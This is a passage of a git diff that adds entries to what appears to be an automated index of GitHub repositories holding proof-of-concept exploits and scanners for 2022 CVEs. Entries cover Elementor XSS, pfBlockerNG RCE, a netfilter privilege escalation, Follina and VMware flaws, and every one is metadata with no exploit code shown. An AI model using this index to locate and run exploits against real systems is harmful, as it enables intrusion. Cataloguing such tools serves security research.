+ "created_at": "2023-04-09T09:07:26Z",
+ "updated_at": "2024-01-16T14:16:06Z",
+ "pushed_at": "2023-04-09T16:02:55Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 1
+ },
{
"id": 723368358,
"name": "CVE-2022-29361_Werkzeug_Client-Side-Desync-to-XSS",
diff --git a/2022/CVE-2022-29455.json b/2022/CVE-2022-29455.json
index 3e8edf62f8..781aa5f476 100644
--- a/2022/CVE-2022-29455.json
+++ b/2022/CVE-2022-29455.json
@@ -58,5 +58,155 @@
"watchers": 14,
"score": 0,
"subscribers_count": 1
+ },
+ {
+ "id": 584983892,
+ "name": "CVE-2022-29455",
+ "full_name": "5l1v3r1\/CVE-2022-29455",
+ "owner": {
+ "login": "5l1v3r1",
+ "id": 34143537,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/34143537?v=4",
+ "html_url": "https:\/\/github.com\/5l1v3r1"
+ },
+ "html_url": "https:\/\/github.com\/5l1v3r1\/CVE-2022-29455",
+ "description": "DOM-based Reflected Cross-Site Scripting (XSS) vulnerability in Elementor's Elementor Website Builder plugin <= 3.5.5 versions. ",
+ "fork": false,
+ "created_at": "2023-01-04T02:40:39Z",
+ "updated_at": "2023-01-04T02:40:35Z",
+ "pushed_at": "2022-11-27T18:46:07Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 585658055,
+ "name": "CVE-2022-29455",
+ "full_name": "yaudahbanh\/CVE-2022-29455",
+ "owner": {
+ "login": "yaudahbanh",
+ "id": 39010800,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/39010800?v=4",
+ "html_url": "https:\/\/github.com\/yaudahbanh"
+ },
+ "html_url": "https:\/\/github.com\/yaudahbanh\/CVE-2022-29455",
+ "description": "Mass Scanner for CVE-2022-29455 on Elementor Plugins Wordpress",
+ "fork": false,
+ "created_at": "2023-01-05T18:29:47Z",
+ "updated_at": "2023-03-22T08:09:03Z",
+ "pushed_at": "2023-01-05T18:30:52Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 3,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 3,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 600651739,
+ "name": "CVE-2022-29455",
+ "full_name": "0xkucing\/CVE-2022-29455",
+ "owner": {
+ "login": "0xkucing",
+ "id": 105418279,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/105418279?v=4",
+ "html_url": "https:\/\/github.com\/0xkucing"
+ },
+ "html_url": "https:\/\/github.com\/0xkucing\/CVE-2022-29455",
+ "description": "CVE-2022-29455",
+ "fork": false,
+ "created_at": "2023-02-12T06:26:11Z",
+ "updated_at": "2023-02-27T14:55:17Z",
+ "pushed_at": "2023-02-24T13:43:56Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 2,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 2,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 647997479,
+ "name": "CVE-2022-29455",
+ "full_name": "tucommenceapousser\/CVE-2022-29455",
+ "owner": {
+ "login": "tucommenceapousser",
+ "id": 129875733,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/129875733?v=4",
+ "html_url": "https:\/\/github.com\/tucommenceapousser"
+ },
+ "html_url": "https:\/\/github.com\/tucommenceapousser\/CVE-2022-29455",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-06-01T01:40:08Z",
+ "updated_at": "2023-06-01T01:42:09Z",
+ "pushed_at": "2023-06-01T01:46:14Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 647998526,
+ "name": "CVE-2022-29455-mass",
+ "full_name": "tucommenceapousser\/CVE-2022-29455-mass",
+ "owner": {
+ "login": "tucommenceapousser",
+ "id": 129875733,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/129875733?v=4",
+ "html_url": "https:\/\/github.com\/tucommenceapousser"
+ },
+ "html_url": "https:\/\/github.com\/tucommenceapousser\/CVE-2022-29455-mass",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-06-01T01:44:45Z",
+ "updated_at": "2023-06-01T01:44:57Z",
+ "pushed_at": "2023-06-01T01:44:54Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
}
]
\ No newline at end of file
diff --git a/2022/CVE-2022-30114.json b/2022/CVE-2022-30114.json
new file mode 100644
index 0000000000..970c3b59e0
--- /dev/null
+++ b/2022/CVE-2022-30114.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 637148341,
+ "name": "CVE-2022-30114",
+ "full_name": "str0ng4le\/CVE-2022-30114",
+ "owner": {
+ "login": "str0ng4le",
+ "id": 83457499,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/83457499?v=4",
+ "html_url": "https:\/\/github.com\/str0ng4le"
+ },
+ "html_url": "https:\/\/github.com\/str0ng4le\/CVE-2022-30114",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-05-06T16:51:30Z",
+ "updated_at": "2023-05-11T08:42:56Z",
+ "pushed_at": "2023-05-12T21:57:16Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2022/CVE-2022-30136.json b/2022/CVE-2022-30136.json
index b915cc7f57..d2bd9b78cd 100644
--- a/2022/CVE-2022-30136.json
+++ b/2022/CVE-2022-30136.json
@@ -28,5 +28,35 @@
"watchers": 10,
"score": 0,
"subscribers_count": 3
+ },
+ {
+ "id": 657715461,
+ "name": "CVE-2022-30136",
+ "full_name": "VEEXH\/CVE-2022-30136",
+ "owner": {
+ "login": "VEEXH",
+ "id": 103153079,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/103153079?v=4",
+ "html_url": "https:\/\/github.com\/VEEXH"
+ },
+ "html_url": "https:\/\/github.com\/VEEXH\/CVE-2022-30136",
+ "description": "Windows Network File System Remote exploit (DoS) PoC",
+ "fork": false,
+ "created_at": "2023-06-23T17:13:22Z",
+ "updated_at": "2023-06-26T07:07:36Z",
+ "pushed_at": "2023-06-23T17:14:48Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
}
]
\ No newline at end of file
diff --git a/2022/CVE-2022-30190.json b/2022/CVE-2022-30190.json
index 74c8df7178..9972ba7cfa 100644
--- a/2022/CVE-2022-30190.json
+++ b/2022/CVE-2022-30190.json
@@ -2362,6 +2362,36 @@
"score": 0,
"subscribers_count": 1
},
+ {
+ "id": 601379517,
+ "name": "CVE-2022-30190",
+ "full_name": "yrkuo\/CVE-2022-30190",
+ "owner": {
+ "login": "yrkuo",
+ "id": 39819798,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/39819798?v=4",
+ "html_url": "https:\/\/github.com\/yrkuo"
+ },
+ "html_url": "https:\/\/github.com\/yrkuo\/CVE-2022-30190",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-02-13T23:58:58Z",
+ "updated_at": "2023-12-25T12:02:49Z",
+ "pushed_at": "2023-02-14T01:29:20Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
{
"id": 613736106,
"name": "FOLLINA-CVE-2022-30190",
@@ -2422,6 +2452,36 @@
"score": 0,
"subscribers_count": 1
},
+ {
+ "id": 640555631,
+ "name": "CVE-2022-30190",
+ "full_name": "aminetitrofine\/CVE-2022-30190",
+ "owner": {
+ "login": "aminetitrofine",
+ "id": 70074517,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/70074517?v=4",
+ "html_url": "https:\/\/github.com\/aminetitrofine"
+ },
+ "html_url": "https:\/\/github.com\/aminetitrofine\/CVE-2022-30190",
+ "description": "Follina (CVE-2022-30190) is a Microsoft Office zero-day vulnerability that has recently been discovered. It’s a high-severity vulnerability that hackers can leverage for remote code execution (RCE) attacks.",
+ "fork": false,
+ "created_at": "2023-05-14T13:38:43Z",
+ "updated_at": "2024-05-19T22:43:57Z",
+ "pushed_at": "2023-05-14T13:45:18Z",
+ "stargazers_count": 5,
+ "watchers_count": 5,
+ "has_discussions": false,
+ "forks_count": 5,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 5,
+ "watchers": 5,
+ "score": 0,
+ "subscribers_count": 1
+ },
{
"id": 667473352,
"name": "Follina_MSDT_CVE-2022-30190",
diff --git a/2022/CVE-2022-30524.json b/2022/CVE-2022-30524.json
new file mode 100644
index 0000000000..52741d1dd6
--- /dev/null
+++ b/2022/CVE-2022-30524.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 599809675,
+ "name": "xpdf-docker",
+ "full_name": "rishvic\/xpdf-docker",
+ "owner": {
+ "login": "rishvic",
+ "id": 40887886,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/40887886?v=4",
+ "html_url": "https:\/\/github.com\/rishvic"
+ },
+ "html_url": "https:\/\/github.com\/rishvic\/xpdf-docker",
+ "description": "Docker images of Xpdf 4.04, vulnerable to CVE-2022-30524",
+ "fork": false,
+ "created_at": "2023-02-09T23:30:39Z",
+ "updated_at": "2024-06-20T09:09:42Z",
+ "pushed_at": "2023-02-10T01:23:16Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 2,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 2,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2022/CVE-2022-30525.json b/2022/CVE-2022-30525.json
index af0ab64bf7..60b04c50bb 100644
--- a/2022/CVE-2022-30525.json
+++ b/2022/CVE-2022-30525.json
@@ -424,6 +424,36 @@
"score": 0,
"subscribers_count": 1
},
+ {
+ "id": 589325446,
+ "name": "CVE-2022-30525_check",
+ "full_name": "cbk914\/CVE-2022-30525_check",
+ "owner": {
+ "login": "cbk914",
+ "id": 2042196,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/2042196?v=4",
+ "html_url": "https:\/\/github.com\/cbk914"
+ },
+ "html_url": "https:\/\/github.com\/cbk914\/CVE-2022-30525_check",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-01-15T20:02:24Z",
+ "updated_at": "2023-01-19T23:43:16Z",
+ "pushed_at": "2023-01-15T20:06:36Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 2
+ },
{
"id": 763860214,
"name": "CVE-2022-30525_Exploit",
diff --git a/2022/CVE-2022-31144.json b/2022/CVE-2022-31144.json
new file mode 100644
index 0000000000..fd9367dc30
--- /dev/null
+++ b/2022/CVE-2022-31144.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 596929868,
+ "name": "CVE-2022-31144",
+ "full_name": "SpiralBL0CK\/CVE-2022-31144",
+ "owner": {
+ "login": "SpiralBL0CK",
+ "id": 25670930,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/25670930?v=4",
+ "html_url": "https:\/\/github.com\/SpiralBL0CK"
+ },
+ "html_url": "https:\/\/github.com\/SpiralBL0CK\/CVE-2022-31144",
+ "description": "CVE-2022-31144 dos pt redis, not finished yet or too soon, this can be turned into rce but oh well if you smart enough",
+ "fork": false,
+ "created_at": "2023-02-03T08:40:38Z",
+ "updated_at": "2023-04-02T16:26:54Z",
+ "pushed_at": "2023-02-03T11:18:00Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2022/CVE-2022-31705.json b/2022/CVE-2022-31705.json
new file mode 100644
index 0000000000..d9bc3f9b0a
--- /dev/null
+++ b/2022/CVE-2022-31705.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 586726069,
+ "name": "cve-2022-31705",
+ "full_name": "s0duku\/cve-2022-31705",
+ "owner": {
+ "login": "s0duku",
+ "id": 83897807,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/83897807?v=4",
+ "html_url": "https:\/\/github.com\/s0duku"
+ },
+ "html_url": "https:\/\/github.com\/s0duku\/cve-2022-31705",
+ "description": "CVE-2022-31705 (Geekpwn 2022 Vmware EHCI OOB) POC ",
+ "fork": false,
+ "created_at": "2023-01-09T04:27:15Z",
+ "updated_at": "2024-05-10T10:48:33Z",
+ "pushed_at": "2023-01-09T08:19:27Z",
+ "stargazers_count": 119,
+ "watchers_count": 119,
+ "has_discussions": false,
+ "forks_count": 27,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 27,
+ "watchers": 119,
+ "score": 0,
+ "subscribers_count": 4
+ }
+]
\ No newline at end of file
diff --git a/2022/CVE-2022-31814.json b/2022/CVE-2022-31814.json
index 464698f021..63718b930b 100644
--- a/2022/CVE-2022-31814.json
+++ b/2022/CVE-2022-31814.json
@@ -33,5 +33,165 @@
"watchers": 3,
"score": 0,
"subscribers_count": 1
+ },
+ {
+ "id": 605094197,
+ "name": "CVE-2022-31814",
+ "full_name": "Madliife0\/CVE-2022-31814",
+ "owner": {
+ "login": "Madliife0",
+ "id": 64816845,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/64816845?v=4",
+ "html_url": "https:\/\/github.com\/Madliife0"
+ },
+ "html_url": "https:\/\/github.com\/Madliife0\/CVE-2022-31814",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-02-22T12:38:13Z",
+ "updated_at": "2023-02-22T12:38:13Z",
+ "pushed_at": "2023-02-22T12:38:14Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 608172527,
+ "name": "CVE-2022-31814",
+ "full_name": "TheUnknownSoul\/CVE-2022-31814",
+ "owner": {
+ "login": "TheUnknownSoul",
+ "id": 58050201,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/58050201?v=4",
+ "html_url": "https:\/\/github.com\/TheUnknownSoul"
+ },
+ "html_url": "https:\/\/github.com\/TheUnknownSoul\/CVE-2022-31814",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-03-01T13:24:29Z",
+ "updated_at": "2023-03-01T16:14:01Z",
+ "pushed_at": "2023-03-03T08:22:22Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 609702147,
+ "name": "RCE",
+ "full_name": "drcayber\/RCE",
+ "owner": {
+ "login": "drcayber",
+ "id": 101327574,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/101327574?v=4",
+ "html_url": "https:\/\/github.com\/drcayber"
+ },
+ "html_url": "https:\/\/github.com\/drcayber\/RCE",
+ "description": "CVE-2022-31814",
+ "fork": false,
+ "created_at": "2023-03-05T00:56:14Z",
+ "updated_at": "2023-09-19T17:16:18Z",
+ "pushed_at": "2023-03-05T01:07:54Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "bug",
+ "exploit",
+ "hunting",
+ "python",
+ "rce",
+ "rce-exploit",
+ "rce-scanner",
+ "web",
+ "webapplication"
+ ],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 618996369,
+ "name": "CVE-2022-31814",
+ "full_name": "Chocapikk\/CVE-2022-31814",
+ "owner": {
+ "login": "Chocapikk",
+ "id": 88535377,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/88535377?v=4",
+ "html_url": "https:\/\/github.com\/Chocapikk"
+ },
+ "html_url": "https:\/\/github.com\/Chocapikk\/CVE-2022-31814",
+ "description": "pfBlockerNG <= 2.1.4_26 Unauth RCE (CVE-2022-31814)",
+ "fork": false,
+ "created_at": "2023-03-26T00:18:04Z",
+ "updated_at": "2023-12-19T11:43:34Z",
+ "pushed_at": "2023-03-26T00:25:48Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 619242757,
+ "name": "CVE-2022-31814",
+ "full_name": "dkstar11q\/CVE-2022-31814",
+ "owner": {
+ "login": "dkstar11q",
+ "id": 123830677,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/123830677?v=4",
+ "html_url": "https:\/\/github.com\/dkstar11q"
+ },
+ "html_url": "https:\/\/github.com\/dkstar11q\/CVE-2022-31814",
+ "description": "pfBlockerNG <= 2.1.4_26 Unauth RCE (CVE-2022-31814)",
+ "fork": false,
+ "created_at": "2023-03-26T17:22:40Z",
+ "updated_at": "2023-03-26T05:38:24Z",
+ "pushed_at": "2023-03-26T00:25:48Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 0
}
]
\ No newline at end of file
diff --git a/2022/CVE-2022-31889.json b/2022/CVE-2022-31889.json
new file mode 100644
index 0000000000..bfd5c6e561
--- /dev/null
+++ b/2022/CVE-2022-31889.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 603422212,
+ "name": "CVE-2022-31889",
+ "full_name": "reewardius\/CVE-2022-31889",
+ "owner": {
+ "login": "reewardius",
+ "id": 68978608,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/68978608?v=4",
+ "html_url": "https:\/\/github.com\/reewardius"
+ },
+ "html_url": "https:\/\/github.com\/reewardius\/CVE-2022-31889",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-02-18T13:14:53Z",
+ "updated_at": "2023-02-18T13:14:53Z",
+ "pushed_at": "2023-02-18T13:25:06Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2022/CVE-2022-31890.json b/2022/CVE-2022-31890.json
new file mode 100644
index 0000000000..4b5ba4110e
--- /dev/null
+++ b/2022/CVE-2022-31890.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 603412932,
+ "name": "CVE-2022-31890",
+ "full_name": "reewardius\/CVE-2022-31890",
+ "owner": {
+ "login": "reewardius",
+ "id": 68978608,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/68978608?v=4",
+ "html_url": "https:\/\/github.com\/reewardius"
+ },
+ "html_url": "https:\/\/github.com\/reewardius\/CVE-2022-31890",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-02-18T12:40:45Z",
+ "updated_at": "2023-09-13T12:24:53Z",
+ "pushed_at": "2023-02-18T13:09:59Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2022/CVE-2022-32074.json b/2022/CVE-2022-32074.json
new file mode 100644
index 0000000000..bda2fd3ab7
--- /dev/null
+++ b/2022/CVE-2022-32074.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 603423307,
+ "name": "CVE-2022-32074",
+ "full_name": "reewardius\/CVE-2022-32074",
+ "owner": {
+ "login": "reewardius",
+ "id": 68978608,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/68978608?v=4",
+ "html_url": "https:\/\/github.com\/reewardius"
+ },
+ "html_url": "https:\/\/github.com\/reewardius\/CVE-2022-32074",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-02-18T13:19:03Z",
+ "updated_at": "2023-02-18T13:19:03Z",
+ "pushed_at": "2023-02-18T13:25:11Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2022/CVE-2022-32132.json b/2022/CVE-2022-32132.json
new file mode 100644
index 0000000000..23d2030e57
--- /dev/null
+++ b/2022/CVE-2022-32132.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 603421211,
+ "name": "CVE-2022-32132",
+ "full_name": "reewardius\/CVE-2022-32132",
+ "owner": {
+ "login": "reewardius",
+ "id": 68978608,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/68978608?v=4",
+ "html_url": "https:\/\/github.com\/reewardius"
+ },
+ "html_url": "https:\/\/github.com\/reewardius\/CVE-2022-32132",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-02-18T13:11:13Z",
+ "updated_at": "2023-02-18T13:11:13Z",
+ "pushed_at": "2023-02-18T13:24:59Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2022/CVE-2022-32199.json b/2022/CVE-2022-32199.json
new file mode 100644
index 0000000000..f77c525bf4
--- /dev/null
+++ b/2022/CVE-2022-32199.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 618754016,
+ "name": "CVE-2022-32199",
+ "full_name": "Toxich4\/CVE-2022-32199",
+ "owner": {
+ "login": "Toxich4",
+ "id": 47368696,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/47368696?v=4",
+ "html_url": "https:\/\/github.com\/Toxich4"
+ },
+ "html_url": "https:\/\/github.com\/Toxich4\/CVE-2022-32199",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-03-25T08:49:58Z",
+ "updated_at": "2023-03-26T15:11:43Z",
+ "pushed_at": "2023-03-29T12:58:51Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2022/CVE-2022-32250.json b/2022/CVE-2022-32250.json
index e64ab2f445..9a50cddf01 100644
--- a/2022/CVE-2022-32250.json
+++ b/2022/CVE-2022-32250.json
@@ -29,6 +29,36 @@
"score": 0,
"subscribers_count": 6
},
+ {
+ "id": 594075430,
+ "name": "CVE-2022-32250-LPE",
+ "full_name": "ysanatomic\/CVE-2022-32250-LPE",
+ "owner": {
+ "login": "ysanatomic",
+ "id": 41269324,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/41269324?v=4",
+ "html_url": "https:\/\/github.com\/ysanatomic"
+ },
+ "html_url": "https:\/\/github.com\/ysanatomic\/CVE-2022-32250-LPE",
+ "description": "LPE PoC of a user-after-free vulnerability in the Linux netfilter subsystem.",
+ "fork": false,
+ "created_at": "2023-01-27T14:44:39Z",
+ "updated_at": "2024-04-23T08:49:32Z",
+ "pushed_at": "2023-02-04T16:27:22Z",
+ "stargazers_count": 8,
+ "watchers_count": 8,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 8,
+ "score": 0,
+ "subscribers_count": 2
+ },
{
"id": 716574497,
"name": "2022-32250LPE",
diff --git a/2022/CVE-2022-33082.json b/2022/CVE-2022-33082.json
new file mode 100644
index 0000000000..6ceb16dad9
--- /dev/null
+++ b/2022/CVE-2022-33082.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 657277228,
+ "name": "cve-2022-33082-exploit",
+ "full_name": "cyberqueenmeg\/cve-2022-33082-exploit",
+ "owner": {
+ "login": "cyberqueenmeg",
+ "id": 62813469,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/62813469?v=4",
+ "html_url": "https:\/\/github.com\/cyberqueenmeg"
+ },
+ "html_url": "https:\/\/github.com\/cyberqueenmeg\/cve-2022-33082-exploit",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-06-22T17:50:18Z",
+ "updated_at": "2023-06-22T18:49:31Z",
+ "pushed_at": "2023-06-22T22:53:58Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2022/CVE-2022-3317.json b/2022/CVE-2022-3317.json
new file mode 100644
index 0000000000..2dd3485f25
--- /dev/null
+++ b/2022/CVE-2022-3317.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 588477448,
+ "name": "CVE-2022-3317",
+ "full_name": "hfh86\/CVE-2022-3317",
+ "owner": {
+ "login": "hfh86",
+ "id": 42328886,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/42328886?v=4",
+ "html_url": "https:\/\/github.com\/hfh86"
+ },
+ "html_url": "https:\/\/github.com\/hfh86\/CVE-2022-3317",
+ "description": "Insufficient validation of untrusted input in Intents in Google Chrome on Android prior to 106.0.5249.62 allowed a remote attacker to bypass navigation restrictions via a crafted HTML page. (Chromium security severity: Low)",
+ "fork": false,
+ "created_at": "2023-01-13T08:06:54Z",
+ "updated_at": "2023-01-13T08:06:54Z",
+ "pushed_at": "2023-01-13T08:06:54Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2022/CVE-2022-34169.json b/2022/CVE-2022-34169.json
